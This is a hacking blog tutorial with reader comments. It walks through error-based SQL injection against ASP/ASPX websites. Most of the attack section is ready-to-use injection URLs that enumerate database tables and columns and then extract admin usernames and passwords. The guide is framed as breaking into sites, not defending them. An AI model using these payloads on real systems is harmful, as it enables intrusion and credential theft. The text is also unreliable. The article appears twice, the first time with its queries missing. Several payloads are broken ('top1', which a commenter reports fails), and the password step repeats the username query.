It has been along time since i wrote an article@ hackaholic there have been a plenty of requests from readers asking me to write some new articles on hacking, After reading the requests from readers i decided that i have to spend some time every week on writing some good articles
Actually I've planned to write a bunch of new articles. But before that i wanted to complete my SQL injection series. So today i will be writing about hacking asp/aspx websites using SQL injection.
If you are new to SQL Injection , i would recommend you to go through my previous articles on Sql Injection.
You can read them from here.
Hacking ASP/ASPX sites
ASPX injection is also similar to PHP based sql injection. But here, we don't use queries that contain order by, union select etc. Instead, we will cheat the server to respond with the information we needed. It is an error based injection technique. We will get the information in the form of errors.
Step 1: Find Out A Vulnerable Link
First, we need find out a vulnerable asp/aspx link which looks like
Step 2: Checking For Vulnerability
As in the PHP based injection, we will test for the vulnerability by adding a single quote at the end of the URL.
In asp/aspx based injections, we need not find out the number of columns or the most vulnerable column. We will directly find out the table names,column names and then we will extract the data.
Step 3: Finding Out The Table Names.
But this may not be the desired table for us. So we need to find out the next table name in the database.
For that, we will use the following query.
Now we will get the second table name as shown in the figure. Still if we don't get our desired table, we will continue the procedure until we get the desired table name. Now the query looks like
Step 4: Finding Out The Columns
Now we got the admin table. So we need to find out the columns now.
Replace admin_table with the table name we got. In our case, it is "vw_system_admin"
If the first column is not related to our desired column names, then follow the steps as we have done in step 3.
Replace first_column_name with the column name we got.
Step 5:Extracting The Data
After finding out all the columns, we need to extract the data such as user names and passwords.
For that, we use the following query
For user name,
For password,
Hope this info helped you, For further doubts and clarifications please pass your comments
Actually I've planned to write a bunch of new articles. But before that i wanted to complete my SQL injection series. So today i will be writing about hacking asp/aspx websites using SQL injection.
If you are new to SQL Injection , i would recommend you to go through my previous articles on Sql Injection.
You can read them from here.
- SQL Injections Part 1
- SQL Injections Part 2
- SQL Injections Part 3
- SQL Injections Part 4
- SQL Injections Part 5
Hacking ASP/ASPX sites
ASPX injection is also similar to PHP based sql injection. But here, we don't use queries that contain order by, union select etc. Instead, we will cheat the server to respond with the information we needed. It is an error based injection technique. We will get the information in the form of errors.
Step 1: Find Out A Vulnerable Link
First, we need find out a vulnerable asp/aspx link which looks like
www.vulnerablesite.com/gallery.aspx?id=10
when i browse my actual link, i get the page as shown in the figure.Step 2: Checking For Vulnerability
As in the PHP based injection, we will test for the vulnerability by adding a single quote at the end of the URL.
www.vulnerablesite.com/gallery.aspx?id=10'
If it gives an error similar to the following, then our site is vulnerable to sql injection.In asp/aspx based injections, we need not find out the number of columns or the most vulnerable column. We will directly find out the table names,column names and then we will extract the data.
Step 3: Finding Out The Table Names.
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 table_name from information_schema.tables))
The above code executes the second query and retrieves the first table name from the database. the windows server cant convert character value into data type. so we will get an error as shown in the following figure from which we can get the first table name.But this may not be the desired table for us. So we need to find out the next table name in the database.
For that, we will use the following query.
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 table_name from information_schema.tables where table_name not in ('first_table_name')))
replace the first_table_name with the actual table name we got above.Now we will get the second table name as shown in the figure. Still if we don't get our desired table, we will continue the procedure until we get the desired table name. Now the query looks like
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 table_name from information_schema.tables where table_name not in ('first_table_name','second_table_name')))
Replace first_table_name and second_table_name with the table names we got in the above steps.Step 4: Finding Out The Columns
Now we got the admin table. So we need to find out the columns now.
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 column_name from information_schema.columns where table_name='admin_table'))
Replace admin_table with the table name we got. In our case, it is "vw_system_admin"
If the first column is not related to our desired column names, then follow the steps as we have done in step 3.
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top1 column_name from information_schema.columns where table_name='admin_table' and column_name not in ('first_column_name')))
Replace first_column_name with the column name we got.
Step 5:Extracting The Data
After finding out all the columns, we need to extract the data such as user names and passwords.
For that, we use the following query
For user name,
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))
For password,
www.vulnerablesite.com/gallery.aspx?id=10 and 1=convert(int,(select top 1 admin_username from admin_table))
Hope this info helped you, For further doubts and clarifications please pass your comments
good one...!!!!
REPLYJust throwing this out there since this is the most recent blog. You do realize that over half of your download section can not be downloaded due to Ziddu no longer allowing file sharing. Please see blelow.
REPLY" Sorry! Ziddu is not offering any file sharing services !! "
What is the name of next TUT after this ONE???
REPLYit is not working with top1 during finding column_name it gives and error like Invalid column name 'top1'.
REPLYVery Conceptual Discussion.it does't matter that it works or not but this stuff gives good basic for hacking.thx
REPLYUse the form below to comment. No spam please!!!